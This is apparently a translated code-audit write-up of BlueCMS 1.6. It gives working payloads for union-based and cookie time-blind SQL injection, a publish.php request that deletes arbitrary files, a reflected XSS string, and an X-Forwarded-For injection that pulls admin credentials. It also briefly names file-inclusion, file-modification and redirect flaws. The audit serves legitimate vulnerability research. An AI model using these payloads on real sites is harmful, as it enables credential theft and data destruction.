Bluecms1.6 code audit

ad_js sql injection

Numeric injection

1%20union%20select%201,2,3,4,5,6,(select%20user())

common.inc.php sql injection

In this document include, should be the basis of some function or configuration, so any document that contains this can be injected emmm
find publish.php, just contains the file

common.inc.php injection point:

if(!$_SESSION['user_id'])
{
    if($_COOKIE['BLUE']['user_id'] && $_COOKIE['BLUE']['user_name'] && $_COOKIE['BLUE']['user_pwd'])
    {
        if(check_cookie($_COOKIE['BLUE']['user_name'], $_COOKIE['BLUE']['user_pwd']))
        {
            update_user_info($_COOKIE['BLUE']['user_name']);
        }
    }
    else if($_COOKIE['BLUE']['user_name'])
    {

        $user_name = $_COOKIE['BLUE']['user_name'];
        $user = $db->query("SELECT COUNT(*) AS num FROM ".table('user')." WHERE user_name='$user_name'");

If you can not see the landing, and only $ _COOKIE [ 'BLUE'] [ 'user_name'] has a value, it will be sql query, but looks like there can only blinds

automatically jump to the landing page after a delay, in order to see the I first clearly annotated Jump:

nothing filtering, delay success

poc:

BLUE[user_name]:w4'and if(((ascii(mid((select database()),1,1)))=98),sleep(3),0)#

publish.php delete any file

In the 316 line:

parameters controllable $ act:

the above mentioned id also controllable, create a test page:

publish.php?act=del_pic&id=test.php

Visit again:

where any deleted files have a lot of columns on this one it ~

user.php xss

There is xss-mail at

admin / card.php xss (reflection type)

No filter name at the direct output, so you can only bomb

name=<script>alert(1)</script>&value=1&price=1&act=do_edit&id=1

user.php file contains

This contains a controllable point, but mostly behind the index.php,% 00 truncation is not successful, I made reference to the online article, with

The maximum length is 256 bytes directory under Windows, Linux directory maximum length of 4096 bytes

Ideas, version 5.2, but not how are included, accounting for pit

comment.php xff injection

payload;

1','1'),('','1','2','1','6',(select concat(admin_name,':',pwd) from blue_admin),'1','1

tpl_manage.php modify any file

user.php any jump

Perhaps that can be used ssrf what is required base64 encoding

to sum up

The first look cms, do not know where to start, a little weakness, some obvious holes or sometimes did not notice, though, that small cms code is not so complicated, the vulnerability is relatively simple and easy to use, be the first to start it, fairly small harvest, after the trial cms most important thing is to get input from the user begin to see This is just a little source of instability? (Nah)